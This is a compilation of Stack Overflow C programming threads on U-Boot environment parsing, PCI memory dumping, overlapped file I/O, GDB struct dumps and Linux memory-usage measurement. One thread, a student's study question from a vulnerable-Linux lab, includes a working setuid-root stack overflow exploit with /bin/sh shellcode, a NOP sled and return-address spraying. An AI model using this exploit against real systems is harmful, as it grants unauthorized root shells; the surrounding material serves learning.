I'm stumped, and I need someone to tell me what I'm missing.
I've had to upgrade the U-boot bootloader on my devices, and naturally I've had to make things fit again. And right now I'm trying to get the U-Boot environment variables accessible from Linux/Android.
Long story short, I've created a file /etc/fw_env.config that points to U-Boot's env section in Flash. As documented here: https://elinux.org/U-boot_environment_variables_in_linux
This has not been successful, and so I started adding print statements to the source code to debug my device. I tracked the error down to a get_config() function, which as one could imagine, opens the /etc/fw_env.config and writes the values within to the necessary variables.
I've narrowed it further down to the sscanf() function, which returns 0, as in 0 variables read and/or written. So, as a sanity check, I isolated the function and made my own little program separately from my source code (variable names and structures I kept exactly the same).
/* sscanf example */
#include <stdio.h>
struct envdev_s {
const char *devname; /* Device name */
long long devoff; /* Device offset */
unsigned long env_size; /* environment size */
unsigned long erase_size; /* device erase size */
unsigned long env_sectors; /* number of environment sectors */
unsigned int mtd_type; /* type of the MTD device */
};
static struct envdev_s envdevices[2] = {};
#define DEVNAME(i) envdevices[(i)].devname
#define DEVOFFSET(i) envdevices[(i)].devoff
#define ENVSIZE(i) envdevices[(i)].env_size
#define DEVESIZE(i) envdevices[(i)].erase_size
#define ENVSECTORS(i) envdevices[(i)].env_sectors
#define DEVTYPE(i) envdevices[(i)].mtd_type
int main ()
{
char dump [] = "/dev/mtd1 0xc0000 0x2000 0x2000\n";
char *devname;
int i = 0;
int rc;
printf("I was here in get_config : dump = %s\n", dump);
printf("I was here in get_config : i = %d\n", i);
rc = sscanf(dump, "%ms %lli %lx %lx %lx",
&devname,
&DEVOFFSET(i),
&ENVSIZE(i),
&DEVESIZE(i),
&ENVSECTORS(i));
printf("I was here in get_config : rc = %d\n", rc);
return 0;
}
Also recreated here: http://cpp.sh/5ckms
Now, when I run this independently, it works as I expect it should, particularly outputting:
I was here in get_config : rc = 4
4 being successful, as char dump [] = "/dev/mtd1 0xc0000 0x2000 0x2000\n";
But when I compile this and run it on my device, it returns:
I was here in get_config : rc = 0
Computer says NO! And no other error messages to work with.
I'm obviously missing some fundamental understanding here. Either some permissions, or some setup-variables somewhere, but I wouldn't know in where to start. Could someone please point me in the right direction?
For completeness, I am answering this question based on the help I have received here on StackOverflow:
As stated in the comments, %ms was not added until Android 9, and I was working on Android 6. It still did not produce any compiler errors which is particularly misleading. I ended up using %s, which worked fine.
Related
The idea behind this program is to simply access the ram and download the data from it to a txt file.
Later Ill convert the txt file to jpeg and hopefully it will be readable .
However when I try and read from the RAM using NEW[] it takes waaaaaay to long to actually copy all the values into the file?
Isnt it suppose to be really fast? I mean I save pictures everyday and it doesn't even take a second?
Is there some other method I can use to dump memory to a file?
#include <stdio.h>
#include <stdlib.h>
#include <hw/pci.h>
#include <hw/inout.h>
#include <sys/mman.h>
main()
{
FILE *fp;
fp = fopen ("test.txt","w+d");
int NumberOfPciCards = 3;
struct pci_dev_info info[NumberOfPciCards];
void *PciDeviceHandler1,*PciDeviceHandler2,*PciDeviceHandler3;
uint32_t *Buffer;
int *BusNumb; //int Buffer;
uint32_t counter =0;
int i;
int r;
int y;
volatile uint32_t *NEW,*NEW2;
uintptr_t iobase;
volatile uint32_t *regbase;
NEW = (uint32_t *)malloc(sizeof(uint32_t));
NEW2 = (uint32_t *)malloc(sizeof(uint32_t));
Buffer = (uint32_t *)malloc(sizeof(uint32_t));
BusNumb = (int*)malloc(sizeof(int));
printf ("\n 1");
for (r=0;r<NumberOfPciCards;r++)
{
memset(&info[r], 0, sizeof(info[r]));
}
printf ("\n 2");
//Here the attach takes place.
for (r=0;r<NumberOfPciCards;r++)
{
(pci_attach(r) < 0) ? FuncPrint(1,r) : FuncPrint(0,r);
}
printf ("\n 3");
info[0].VendorId = 0x8086; //Wont be using this one
info[0].DeviceId = 0x3582; //Or this one
info[1].VendorId = 0x10B5; //WIll only be using this one PLX 9054 chip
info[1].DeviceId = 0x9054; //Also PLX 9054
info[2].VendorId = 0x8086; //Not used
info[2].DeviceId = 0x24cb; //Not used
printf ("\n 4");
//I attached the device and give it a handler and set some setting.
if ((PciDeviceHandler1 = pci_attach_device(0,PCI_SHARE|PCI_INIT_ALL, 0, &info[1])) == 0)
{
perror("pci_attach_device fail");
exit(EXIT_FAILURE);
}
for (i = 0; i < 6; i++)
//This just prints out some details of the card.
{
if (info[1].BaseAddressSize[i] > 0)
printf("Aperture %d: "
"Base 0x%llx Length %d bytes Type %s\n", i,
PCI_IS_MEM(info[1].CpuBaseAddress[i]) ? PCI_MEM_ADDR(info[1].CpuBaseAddress[i]) : PCI_IO_ADDR(info[1].CpuBaseAddress[i]),
info[1].BaseAddressSize[i],PCI_IS_MEM(info[1].CpuBaseAddress[i]) ? "MEM" : "IO");
}
printf("\nEnd of Device random info dump---\n");
printf("\nNEWs Address : %d\n",*(int*)NEW);
//Not sure if this is a legitimate way of memory allocation but I cant see to read the ram any other way.
NEW = mmap_device_memory(NULL, info[1].BaseAddressSize[3],PROT_READ|PROT_WRITE|PROT_NOCACHE, 0,info[1].CpuBaseAddress[3]);
//Here is where things are starting to get messy and REALLY long to just run through all the ram and dump it.
//Is there some other way I can dump the data in the ram into a file?
while (counter!=info[1].BaseAddressSize[3])
{
fprintf(fp, "%x",NEW[counter]);
counter++;
}
fclose(fp);
printf("0x%x",*Buffer);
}
A few issues that I can see:
You are writing blocks of 4 bytes - that's quite inefficient. The stream buffering in the C library may help with that to a degree, but using larger blocks would still be more efficient.
Even worse, you are writing out the memory dump in hexadecimal notation, rather than the bytes themselves. That conversion is very CPU-intensive, not to mention that the size of the output is essentially doubled. You would be better off writing raw binary data using e.g. fwrite().
Depending on the specifics of your system (is this on QNX?), reading from I/O-mapped memory may be slower than reading directly from physical memory, especially if your PCI device has to act as a relay. What exactly is it that you are doing?
In any case I would suggest using a profiler to actually find out where your program is spending most of its time. Even a rudimentary system monitor would allow you to determine if your program is CPU-bound or I/O-bound.
As it is, "waaaaaay to long" is hardly a valid measurement. How much data is being copied? How long does it take? Where is the output file located?
P.S.: I also have some concerns w.r.t. what you are trying to do, but that is slightly off-topic for this question...
For fastest speed: write the data in binary form and use the open() / write() / close() API-s. Since your data is already available in a contiguous block of (virtual) memory it is a waste to copy it to a temporary buffer (used by the fwrite(), fprintf(), etc. API-s).
The code using write() will be similar to:
int fd = open("filename.bin", O_RDWR|O_CREAT, S_IRWXU);
write(fd, (void*)NEW, 4*info[1].BaseAddressSize[3]);
close(fd);
You will need to add error handling and make sure that the buffer size is specified correctly.
To reiterate, you get the speed-up from:
avoiding the conversion from binary to ASCII (as pointed out by others above)
avoiding many calls to libc
reducing the number of system-calls (from inside libc)
eliminating the overhead of copying data to a temporary buffer inside the fwrite()/fprintf() and related functions (buffering would be useful if your data arrived in small chunks, including the case of converting to ASCII in 4 byte units)
I intentionally ignore commenting on other parts of your code as it is apparently not intended to be production quality yet and your question is focused on how to speed up writing data to a file.
I'm a computer engineering student who is studying how stack buffer overflows work. The book I'm reading is The Art of Exploitation (1st edition) by Jon Erickson.
In order to practice what I'm studying I've installed Damn Vulnerable Linux distribution in a virtual machine. I've disabled ASRL (kernel.randomize_va_space = 0), I've compiled the following codes with GCC 3.4.6, I'm using GDB 6.6 and the kernel of the distribution is 2.6.20. My computer has an Intel processor.
The vulnerable program (test2) is created by root and is set as setuid.
The vulnerable code is the following:
//test2.c
int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
While the exploit code, created by normal (non root) user, is the following:
//main.c
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned long sp(void)
{
__asm__("movl %esp, %eax");
}
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer2, *ptr;
offset = 0;
esp = sp();
ret = esp - offset;
printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);
buffer2 = malloc(600);
ptr = buffer2;
addr_ptr = (long *)ptr;
for (i = 0; i < 600; i += 4)
{
*(addr_ptr++) = ret;
}
for (i = 0; i < 200; i++)
{
buffer2[i] = '\x90';
}
ptr = buffer2 + 200;
for (i = 0; i < strlen(shellcode); i++)
{
*(ptr++) = shellcode[i];
}
buffer2[600 - 1] = 0;
execl("/root/workspace/test2/Release/test2", "test2", buffer2, 0);
free(buffer2);
return 0;
}
The program works, it exploits the buffer overflow vulnerability in test2 and gives me a root shell.
What I don't understand, even after reading the book several times and trying to find answers on the internet, is why the value of the stack pointer that we store in the variable esp is the return address of our shellcode. I've disassembled the program with GDB and everything works as the author says but I don't understand why this happens.
I would have liked to show you how the disassembled program looked like and how the memory looked like during execution, but I cannot copy/paste from the guest machine on the virtual machine and I'm not allowed to insert images in my question. So I can only try to describe what happens during execution of the program main (the one that exploits the BOF in test2):
disassembling main, I see that 28 bytes are allocated on the stack (7 variables * 4 bytes). Then the function sp() is called and the value of the stack pointer is stored in esp. The value stored in the variable esp is 0xbffff344. Then, as you can see, we have some printf, we store the payload in buffer2 and then we call the execl function passing buffer2 as an argument.
now the root shell shows up and then the program exits. Disassembling the program after setting a different offset, I can clearly see that 0xbffff344 is precisely the address where the payload is stored when test2 is executed. Could you explain me how does this happen? Does execl sets a new stack frame for the test2 program? In main.c only 28 bytes are allocated on the stack, while in test2 500 bytes are allocated on the stack (for buffer2). So how do I know that the stack pointer that i get in main.c is precisely the return address of the shellcode?
I thank you and apologize if I wrote some stupid things.
Could you explain me how does this happen?
When ASLR is disabled every executable starts at the same address, so given the stack pointer you are able to guess the required offset to find your buffer location in test2. This is also where the NOP sled becomes useful, since it give you multiple possible hit if the offset is not the exact displacement to the shellcode.
That being said the fact the the value of ESP in the main function of your exploit program IS the location of the executed buffer in test2 seems incorrect. Are you sure you just don't misinterpreted gdb results?
You should be able to compute the offset of the buffer using the following : esp - 500 + 28.
Note that you should always wear gloves when using such formula : how the compiler handles locals, (size, order, etc) can vary.
So how do I know that the stack pointer that i get in main.c is precisely the return address of the shellcode?
Well You don't. It depends of the machine, how the program was compiled etc.
Does execl sets a new stack frame for the test2 program?
From the execve man pages :
The exec family of functions shall replace the current process image
with a new process image. The new image shall be constructed from a
regular, executable file called the new process image file. There
shall be no return from a successful exec, because the calling process
image is overlaid by the new process image.
The stack is overridden by a new one for test2.
Hope it helps :)
I have a program running on an ARM-based embedded device. A certain struct, globally accessible, is being dumped every so often to disk and represents about 160Kb of data.
I need to examine the contents of this structure. So far I have used a Python script together with the struct library to parse the contents of that dump, but this approach doesn't scale very well.
I thought it was possible to use the cross-compiling GDB program to do this. I want to copy the contents of that file back into memory, at the address of the structure. So this is what I tried:
$ arm-eabi-gdb
....
(gdb) target sim
Connected to the simulator.
(gdb) file MS.elf
Reading symbols from MS.elf...done.
(gdb) p &my_struct
$1 = (MyStruct *) 0x6801149c
(gdb) restore ~/Dumps/MS_20121128_164606 binary 0x6801149c
You can't do that without a process to debug.
Is this the correct approach? If yes, what am I doing wrong?
I would write a small program that reads in the struct and then in the
debug mode print it.
The program needs to be compiled on system with the same
architecture characteristics as ARM. I.e. same sizeof
char, int, short, long, float, double and pointer.
Also, the byte ordering needs to be the same as on ARM.
If you are looking at the struct often, then it would be
worth pretty printing out the contents of the struct
instead of constantly using gdb to see the contents.
Since the structure is quite large, I would also go the
extra step of using an API that puts the structure
in a folder/document type tree in a browser so that
you can zoom in or browse different parts of the struct.
If anyone interested in this, let me know.
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
struct Foo {
/* contents of the struct go here */
};
int
main()
{
struct Foo tmp;
int fd, r, n = sizeof(tmp);
fd = open("struct_dump", O_RDONLY);
if (fd < 0) {
printf("could not open struct_dump.\n");
exit(0);
}
r = read(fd, &tmp, n);
if (r != n) {
printf("mismatched struct sizes.\n");
exit(0);
}
/*
* Stop here in gdb and do 'p tmp'
*/
close(fd);
exit(0);
}
I have a C application which generates a lot of output and for which speed is critical. The program is basically a loop over a large (8-12GB) binary input file which must be read sequentially. In each iteration the read bytes are processed and output is generated and written to multiple files, but never to multiple files at the same time. So if you are at the point where output is generated and there are 4 output files you write to either file 0 or 1 or 2, or 3. At the end of the iteration I now write the output using fwrite(), thereby waiting for the write operation to finish. The total number of output operations is large, up to 4 million per file, and output size of files ranges from 100mb to 3.5GB. The program runs on a basic multicore processor.
I want to write output in a separate thread and I know this can be done with
Asyncronous I/O
Creating threads
I/O completion ports
I have 2 type of questions, namely conceptual and code specific.
Conceptual Question
What would be the best approach. Note that the application should be portable to Linux, however, I don't see how that would be very important for my choice for 1-3, since I would write a wrapper around anything kernel/API specific. For me the most important criteria is speed. I have read that option 1 is not that likely to increase the performance of the program and that the kernel in any case creates new threads for the i/o operation, so then why not use option (2) immediately with the advantage that it seems easier to program (also since I did not succeed with option (1), see code issues below).
Note that I read https://stackoverflow.com/questions/3689759/how-can-i-run-a-specific-function-of-thread-asynchronously-in-c-c, but I dont see a motivation on what to use based on the nature of the application. So I hope somebody could provide me with some advice what would be best in my situation. Also from the book "Windows System Programming" by Johnson M. Hart, I know that the recommendation is using threads, mainly because of the simplicity. However, will it also be fastest?
Code Question
This question involves the attempts I made so far to make asynchronous I/O work. I understand that its a big piece of code so that its not that easy to look into. In any case I would really appreciate any attempt.
To decrease execution time I try to write the output by means of a new thread using WINAPI via CreateFile() with FILE_FLAGGED_OVERLAP with an overlapped structure. I have created a sample program in which I try to get this to work. However, I encountered 2 problems:
The file is only opened in overlapped mode when I delete an already existing file (I have tried using CreateFile in different modes (CREATE_ALWAYS, CREATE_NEW, OPEN_EXISTING), but this does not help).
Only the first WriteFile is executed asynchronously. The remainder of WriteFile commands is synchronous. For this problem I already consulted http://support.microsoft.com/kb/156932. It seems that the problem I have is related to the fact that "any write operation to a file that extends its length will be synchronous". I've already tried to solve this by increasing file size/valid data size (commented region in code). However, I still do not get it to work. I'm aware of the fact that it could be the case that to get most out of asynchronous io i should CreateFile with FILE_FLAG_NO_BUFFERING, however I cannot get this to work as well.
Please note that the program creates a file of about 120mb in the path of execution. Also note that print statements "not ok" are not desireable, I would like to see "can do work in background" appear on my screen... What goes wrong here?
#include <windows.h>
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define ASYNC // remove this definition to run synchronously (i.e. using fwrite)
#ifdef ASYNC
struct _OVERLAPPED *pOverlapped;
HANDLE *pEventH;
HANDLE *pFile;
#else
FILE *pFile;
#endif
#define DIM_X 100
#define DIM_Y 150000
#define _PRINTERROR(msgs)\
{printf("file: %s, line: %d, %s",__FILE__,__LINE__,msgs);\
fflush(stdout);\
return 0;} \
#define _PRINTF(msgs)\
{printf(msgs);\
fflush(stdout);} \
#define _START_TIMER \
time_t time1,time2; \
clock_t clock1; \
time(&time1); \
printf("start time: %s",ctime(&time1)); \
fflush(stdout);
#define _END_TIMER\
time(&time2);\
clock1 = clock();\
printf("end time: %s",ctime(&time2));\
printf("elapsed processor time: %.2f\n",(((float)clock1)/CLOCKS_PER_SEC));\
fflush(stdout);
double aio_dat[DIM_Y] = {0};
double do_compute(double A,double B, int arr_len);
int main()
{
_START_TIMER;
const char *pName = "test1.bin";
DWORD dwBytesToWrite;
BOOL bErrorFlag = FALSE;
int j=0;
int i=0;
int fOverlapped=0;
#ifdef ASYNC
// create / open the file
pFile=CreateFile(pName,
GENERIC_WRITE, // open for writing
0, // share write access
NULL, // default security
CREATE_ALWAYS, // create new/overwrite existing
FILE_FLAG_OVERLAPPED, // | FILE_FLAG_NO_BUFFERING, // overlapped file
NULL); // no attr. template
// check whether file opening was ok
if(pFile==INVALID_HANDLE_VALUE){
printf("%x\n",GetLastError());
_PRINTERROR("file not opened properly\n");
}
// make the overlapped structure
pOverlapped = calloc(1,sizeof(struct _OVERLAPPED));
pOverlapped->Offset = 0;
pOverlapped->OffsetHigh = 0;
// put event handle in overlapped structure
if(!(pOverlapped->hEvent = CreateEvent(NULL,TRUE,FALSE,NULL))){
printf("%x\n",GetLastError());
_PRINTERROR("error in createevent\n");
}
#else
pFile = fopen(pName,"wb");
#endif
// create some output
for(j=0;j<DIM_Y;j++){
aio_dat[j] = do_compute(i, j, DIM_X);
}
// determine how many bytes should be written
dwBytesToWrite = (DWORD)sizeof(aio_dat);
for(i=0;i<DIM_X;i++){ // do this DIM_X times
#ifdef ASYNC
//if(i>0){
//SetFilePointer(pFile,dwBytesToWrite,NULL,FILE_CURRENT);
//if(!(SetEndOfFile(pFile))){
// printf("%i\n",pFile);
// _PRINTERROR("error in set end of file\n");
//}
//SetFilePointer(pFile,-dwBytesToWrite,NULL,FILE_CURRENT);
//}
// write the bytes
if(!(bErrorFlag = WriteFile(pFile,aio_dat,dwBytesToWrite,NULL,pOverlapped))){
// check whether io pending or some other error
if(GetLastError()!=ERROR_IO_PENDING){
printf("lasterror: %x\n",GetLastError());
_PRINTERROR("error while writing file\n");
}
else{
fOverlapped=1;
}
}
else{
// if you get here output got immediately written; bad!
fOverlapped=0;
}
if(fOverlapped){
// do background, this msgs is what I want to see
for(j=0;j<DIM_Y;j++){
aio_dat[j] = do_compute(i, j, DIM_X);
}
for(j=0;j<DIM_Y;j++){
aio_dat[j] = do_compute(i, j, DIM_X);
}
_PRINTF("can do work in background\n");
}
else{
// not overlapped, this message is bad
_PRINTF("not ok\n");
}
// wait to continue
if((WaitForSingleObject(pOverlapped->hEvent,INFINITE))!=WAIT_OBJECT_0){
_PRINTERROR("waiting did not succeed\n");
}
// reset event structure
if(!(ResetEvent(pOverlapped->hEvent))){
printf("%x\n",GetLastError());
_PRINTERROR("error in resetevent\n");
}
pOverlapped->Offset+=dwBytesToWrite;
#else
fwrite(aio_dat,sizeof(double),DIM_Y,pFile);
for(j=0;j<DIM_Y;j++){
aio_dat[j] = do_compute(i, j, DIM_X);
}
for(j=0;j<DIM_Y;j++){
aio_dat[j] = do_compute(i, j, DIM_X);
}
#endif
}
#ifdef ASYNC
CloseHandle(pFile);
free(pOverlapped);
#else
fclose(pFile);
#endif
_END_TIMER;
return 1;
}
double do_compute(double A,double B, int arr_len)
{
int i;
double res = 0;
double *xA = malloc(arr_len * sizeof(double));
double *xB = malloc(arr_len * sizeof(double));
if ( !xA || !xB )
abort();
for (i = 0; i < arr_len; i++) {
xA[i] = sin(A);
xB[i] = cos(B);
res = res + xA[i]*xA[i];
}
free(xA);
free(xB);
return res;
}
Useful links
http://software.intel.com/sites/products/documentation/studio/composer/en-us/2011/compiler_c/cref_cls/common/cppref_asynchioC_aio_read_write_eg.htm
http://www.ibm.com/developerworks/linux/library/l-async/?ca=dgr-lnxw02aUsingPOISIXAIOAPI
http://www.flounder.com/asynchexplorer.htm#Asynchronous%20I/O
I know this is a big question and I would like to thank everybody in advance who takes the trouble reading it and perhaps even respond!
You should be able to get this to work using the OVERLAPPED structure.
You're on the right track: the system is preventing you from writing asynchronously because every WriteFile extends the size of the file. However, you're doing the file size extension wrong. Simply calling SetFileSize will not actually reserve space in the MFT. Use the SetFileValidData function. This will allocate clusters for your file (note that they will contain whatever garbage the disk had there) and you should be able to execute WriteFile and your computation in parallel.
I would stay away from FILE_FLAG_NO_BUFFERING. You're after more performance with parallelism I presume? Don't prevent the cache from doing its job.
Another option that you did not consider is a memory mapped file. Those are available on Windows and Linux. There is a handy Boost abstraction that you could use.
With a memory mapped file, every thread in your process could write its output to the file on its own time, assuming that the record sizes are known and each thread has its own output area.
The operating system will take care of writing the mapped pages to disk when needed or when it gets around to it or when you close the file. Maybe when you close the file. Now that I think about it, some operating systems may require that you call msync to guarantee it.
I don't see why you would want to write asynchronously. Doing things in parallel does not make them faster in all cases. If you write two file at the same time to the same disk, it will almost always be a lot faster. If that is the case, just write them one after another.
If you have some fancy drive like SSD or a virtual RAM drive, parallel writing could be faster. You have to create an file with at full size and then do your parallel magic.
Asynchronous writing is nice, but is done by any OS anyway. The potential gain for you is that you can do other things than writing to disk like displaying a progress bar. This is where multi-threading can help you.
So imho you should use serial writing or parallel writing to multiple disks.
hth
I need to get the memory usage of the current process in C. Can someone offer a code sample of how to do this on a Linux platform?
I'm aware of the cat /proc/<your pid>/status method of getting memory usage, but I have no idea how to capture that in C.
BTW, it's for a PHP extension I'm modifying (granted, I'm a C newbie). If there are shortcuts available within the PHP extension API, that would be even more helpful.
The getrusage library function returns a structure containing a whole lot of data about the current process, including these:
long ru_ixrss; /* integral shared memory size */
long ru_idrss; /* integral unshared data size */
long ru_isrss; /* integral unshared stack size */
However, the most up-to-date linux documentation says about these 3 fields
(unmaintained) This field is currently unused on Linux
which the manual then defines as:
Not all fields are completed; unmaintained fields are set to zero by the kernel. (The unmaintained fields are provided for compatibility with other systems, and because they may one day be supported on Linux.)
See getrusage(2)
You can always just open the 'files' in the /proc system as you would a regular file (using the 'self' symlink so you don't have to look up your own pid):
FILE* status = fopen( "/proc/self/status", "r" );
Of course, you now have to parse the file to pick out the information you need.
This is a terribly ugly and non-portable way of getting the memory usage, but since getrusage()'s memory tracking is essentially useless on Linux, reading /proc/<pid>/statm is the only way I know of to get the information on Linux.
If anyone know of cleaner, or preferably more cross-Unix ways of tracking memory usage, I would be very interested in learning how.
typedef struct {
unsigned long size,resident,share,text,lib,data,dt;
} statm_t;
void read_off_memory_status(statm_t& result)
{
unsigned long dummy;
const char* statm_path = "/proc/self/statm";
FILE *f = fopen(statm_path,"r");
if(!f){
perror(statm_path);
abort();
}
if(7 != fscanf(f,"%ld %ld %ld %ld %ld %ld %ld",
&result.size,&result.resident,&result.share,&result.text,&result.lib,&result.data,&result.dt))
{
perror(statm_path);
abort();
}
fclose(f);
}
From the proc(5) man-page:
/proc/[pid]/statm
Provides information about memory usage, measured in pages.
The columns are:
size total program size
(same as VmSize in /proc/[pid]/status)
resident resident set size
(same as VmRSS in /proc/[pid]/status)
share shared pages (from shared mappings)
text text (code)
lib library (unused in Linux 2.6)
data data + stack
dt dirty pages (unused in Linux 2.6)
I came across this post: http://appcrawler.com/wordpress/2013/05/13/simple-example-of-tracking-memory-using-getrusage/
Simplified version:
#include <sys/resource.h>
#include <stdio.h>
int main() {
struct rusage r_usage;
getrusage(RUSAGE_SELF,&r_usage);
// Print the maximum resident set size used (in kilobytes).
printf("Memory usage: %ld kilobytes\n",r_usage.ru_maxrss);
return 0;
}
(tested in Linux 3.13)
#include <sys/resource.h>
#include <errno.h>
errno = 0;
struct rusage memory;
getrusage(RUSAGE_SELF, &memory);
if(errno == EFAULT)
printf("Error: EFAULT\n");
else if(errno == EINVAL)
printf("Error: EINVAL\n");
printf("Usage: %ld\n", memory.ru_ixrss);
printf("Usage: %ld\n", memory.ru_isrss);
printf("Usage: %ld\n", memory.ru_idrss);
printf("Max: %ld\n", memory.ru_maxrss);
I used this code but for some reason I get 0 all the time for all 4 printf()
I'm late to the party, but this might be helpful for anyone else looking for the resident and virtual (and their peak values so far) memories on linux.
It's probably pretty terrible, but it gets the job done.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
* Measures the current (and peak) resident and virtual memories
* usage of your linux C process, in kB
*/
void getMemory(
int* currRealMem, int* peakRealMem,
int* currVirtMem, int* peakVirtMem) {
// stores each word in status file
char buffer[1024] = "";
// linux file contains this-process info
FILE* file = fopen("/proc/self/status", "r");
// read the entire file
while (fscanf(file, " %1023s", buffer) == 1) {
if (strcmp(buffer, "VmRSS:") == 0) {
fscanf(file, " %d", currRealMem);
}
if (strcmp(buffer, "VmHWM:") == 0) {
fscanf(file, " %d", peakRealMem);
}
if (strcmp(buffer, "VmSize:") == 0) {
fscanf(file, " %d", currVirtMem);
}
if (strcmp(buffer, "VmPeak:") == 0) {
fscanf(file, " %d", peakVirtMem);
}
}
fclose(file);
}
The above struct was taken from 4.3BSD Reno. Not all fields are mean-
ingful under Linux. In linux 2.4 only the fields ru_utime, ru_stime,
ru_minflt, and ru_majflt are maintained. Since Linux 2.6, ru_nvcsw and
ru_nivcsw are also maintained.
http://www.atarininja.org/index.py/tags/code